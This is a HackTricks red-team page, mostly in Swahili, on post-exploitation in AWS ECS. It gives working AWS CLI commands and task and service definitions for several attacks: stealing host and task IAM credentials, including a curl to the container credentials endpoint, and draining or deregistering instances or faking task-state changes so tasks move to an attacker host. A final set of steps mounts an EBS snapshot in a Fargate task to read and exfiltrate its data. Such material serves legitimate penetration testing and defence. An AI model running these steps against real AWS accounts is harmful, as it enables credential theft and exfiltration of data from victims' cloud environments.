AWS - ECS Post Exploitation

Tip

Jifunze na ufanye mazoezi ya AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE)
Jifunze na ufanye mazoezi ya GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)
Jifunze na ufanye mazoezi ya Az Hacking: HackTricks Training Azure Red Team Expert (AzRTE)

Saidia HackTricks

ECS

Kwa taarifa zaidi angalia:

AWS - ECS Enum

Host IAM Roles

Katika ECS, IAM role inaweza kuambatanishwa na task inayotekelezwa ndani ya container. Kama task inaendeshwa ndani ya EC2 instance, hiyo EC2 instance itakuwa na IAM role nyingine imeambatanishwa nayo.
Hii ina maana kwamba ikiwa utaweza compromise ECS instance unaweza kwa uwezekano kupata IAM role inayohusishwa na ECR na EC2 instance. Kwa taarifa zaidi juu ya jinsi ya kupata credentials hizo angalia:

Cloud SSRF - HackTricks

Caution

IMDSv2 with a hop limit of 1 does not block awsvpc or host-networked tasks—only Docker bridge tasks sit far enough away for the responses to die. See ECS-on-EC2 IMDS Abuse & ECS Agent Impersonation for the full attack workflow and bypass notes. Recent Latacora research shows that awsvpc and host tasks still fetch host credentials even when IMDSv2+h=1 is enforced.

Privesc to node to steal other containers creds & secrets

Zaidi ya hayo, EC2 inatumia docker kuendesha ECs tasks, hivyo ikiwa unaweza ku-escape hadi node au kupata access kwa docker socket, unaweza kuangalia ambazo containers nyingine zinaendeshwa, na hata kuingia ndani yao na kuiba IAM roles zao zilizoambatanishwa.

Making containers run in current host

Zaidi ya hayo, EC2 instance role kawaida itakuwa na permissions za kutosha za kuboresha container instance state ya EC2 instances zinazotumika kama nodes ndani ya cluster. Mshambuliaji anaweza kubadilisha state ya instance kuwa DRAINING, kisha ECS itatoa tasks zote kutoka kwake na zile zinazoendeshwa kama REPLICA zitaendeshwa kwenye instance tofauti, labda ndani ya attackers instance, ili aweze kuiba IAM roles zao na taarifa nyeti zilizo ndani ya container.

aws ecs update-container-instances-state \
--cluster <cluster> --status DRAINING --container-instances <container-instance-id>

Mbinu ile ile inaweza kufanywa kwa kuondoa usajili wa EC2 instance kutoka kwenye cluster. Hii inaweza kuwa isiyo ya kimya lakini italazimisha tasks zifanyike katika instances nyingine:

aws ecs deregister-container-instance \
--cluster <cluster> --container-instance <container-instance-id> --force

Mbinu ya mwisho ya kulazimisha utekelezaji upya wa tasks ni kumjulisha ECS kwamba task au container ilisimamishwa. Kuna 3 APIs zinazowezekana kufanya hivyo:

# Needs: ecs:SubmitTaskStateChange
aws ecs submit-task-state-change --cluster <value> \
--status STOPPED --reason "anything" --containers [...]

# Needs: ecs:SubmitContainerStateChange
aws ecs submit-container-state-change ...

# Needs: ecs:SubmitAttachmentStateChanges
aws ecs submit-attachment-state-changes ...

Jiunge na Cluster Ukiwa na Attacker Host (Register Container Instance)

Tofauti nyingine (inayoelekea zaidi kuliko “draining”) ni kuongeza uwezo unaodhibiti kwenye cluster kwa kuisajili EC2 instance kama container instance (ecs:RegisterContainerInstance) na kuweka attributes zinazohitajika za container instance ili placement constraints ziwe sawa. Mara tasks zinapoweka kwenye host yako, unaweza kuangalia/ku-exec ndani ya containers na kuvuna kredenshiali za AWS_CONTAINER_CREDENTIALS_RELATIVE_URI.

Tazama ukurasa wa ECS privesc sehemu kuhusu ecs:RegisterContainerInstance kwa mtiririko kamili.

Kunyang’anya taarifa nyeti kutoka ECR containers

EC2 instance hiyo labda itakuwa na ruhusa ecr:GetAuthorizationToken inayoruhusu kupakua images (utaweza kutafuta taarifa nyeti ndani yao).

Kunyang’anya Task Role Credentials kupitia ecs:ExecuteCommand

Ikiwa ExecuteCommand imewezeshwa kwenye task, principal mwenye ecs:ExecuteCommand + ecs:DescribeTasks anaweza kufungua shell ndani ya container inayotumika kisha kuuliza task credentials endpoint ili kuvuna kredenshiali za task role:

  • From inside the container: curl -s "http://169.254.170.2$AWS_CONTAINER_CREDENTIALS_RELATIVE_URI"
  • Use the returned AccessKeyId/SecretAccessKey/Token to call AWS APIs as the task role

Angalia ukurasa wa ECS privilege escalation kwa ajili ya enumeration na mifano ya amri.

Mount an EBS snapshot directly in an ECS task (configuredAtLaunch + volumeConfigurations)

Tumia vibaya muunganiko wa asili wa ECS EBS (2024+) ili ku-mount yaliyomo katika snapshot ya EBS iliyopo moja kwa moja ndani ya ECS task/service mpya na kusoma data yake kutoka ndani ya container.

  • Inahitajika (chini kabisa):

  • ecs:RegisterTaskDefinition

  • One of: ecs:RunTask OR ecs:CreateService/ecs:UpdateService

  • iam:PassRole on:

  • ECS infrastructure role inayotumika kwa volumes (policy: service-role/AmazonECSInfrastructureRolePolicyForVolumes)

  • Task execution/Task roles zinazorejelewa na task definition

  • Ikiwa snapshot imefungwa kwa kutumia CMK: KMS permissions kwa infra role (the AWS managed policy above includes the required KMS grants for AWS managed keys).

  • Athari: Soma yaliyomo kwenye diski kutoka snapshot (mf. mafaili ya database) ndani ya container na kutoa data kupitia network/logs.

Hatua (mfano wa Fargate):

  1. Unda ECS infrastructure role (ikiwa haipo) na uambatiane managed policy:
aws iam create-role --role-name ecsInfrastructureRole \
--assume-role-policy-document '{"Version":"2012-10-17","Statement":[{"Effect":"Allow","Principal":{"Service":"ecs.amazonaws.com"},"Action":"sts:AssumeRole"}]}'
aws iam attach-role-policy --role-name ecsInfrastructureRole \
--policy-arn arn:aws:iam::aws:policy/service-role/AmazonECSInfrastructureRolePolicyForVolumes

Sajili task definition yenye volume iliyopewa alama configuredAtLaunch na uibandike (mount) kwenye container. Mfano (inachapisha secret kisha inalala):

{
"family": "ht-ebs-read",
"networkMode": "awsvpc",
"requiresCompatibilities": ["FARGATE"],
"cpu": "256",
"memory": "512",
"executionRoleArn": "arn:aws:iam::<ACCOUNT_ID>:role/ecsTaskExecutionRole",
"containerDefinitions": [
{"name":"reader","image":"public.ecr.aws/amazonlinux/amazonlinux:latest",
"entryPoint":["/bin/sh","-c"],
"command":["cat /loot/secret.txt || true; sleep 3600"],
"logConfiguration":{"logDriver":"awslogs","options":{"awslogs-region":"us-east-1","awslogs-group":"/ht/ecs/ebs","awslogs-stream-prefix":"reader"}},
"mountPoints":[{"sourceVolume":"loot","containerPath":"/loot","readOnly":true}]
}
],
"volumes": [ {"name":"loot", "configuredAtLaunch": true} ]
}
  1. Unda au sasisha service ukipitisha EBS snapshot kupitia volumeConfigurations.managedEBSVolume (inahitaji iam:PassRole kwenye infra role). Mfano:
{
"cluster": "ht-ecs-ebs",
"serviceName": "ht-ebs-svc",
"taskDefinition": "ht-ebs-read",
"desiredCount": 1,
"launchType": "FARGATE",
"networkConfiguration": {"awsvpcConfiguration":{"assignPublicIp":"ENABLED","subnets":["subnet-xxxxxxxx"],"securityGroups":["sg-xxxxxxxx"]}},
"volumeConfigurations": [
{"name":"loot","managedEBSVolume": {"roleArn":"arn:aws:iam::<ACCOUNT_ID>:role/ecsInfrastructureRole", "snapshotId":"snap-xxxxxxxx", "filesystemType":"ext4"}}
]
}
  1. Wakati kazi inaanza, kontena inaweza kusoma yaliyomo ya snapshot kwenye njia ya mount iliyosanidiwa (mfano, /loot). Exfiltrate kupitia mtandao/logs ya kazi.

Usafishaji:

aws ecs update-service --cluster ht-ecs-ebs --service ht-ebs-svc --desired-count 0
aws ecs delete-service --cluster ht-ecs-ebs --service ht-ebs-svc --force
aws ecs deregister-task-definition ht-ebs-read

Marejeleo

Tip

Jifunze na ufanye mazoezi ya AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE)
Jifunze na ufanye mazoezi ya GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)
Jifunze na ufanye mazoezi ya Az Hacking: HackTricks Training Azure Red Team Expert (AzRTE)

Saidia HackTricks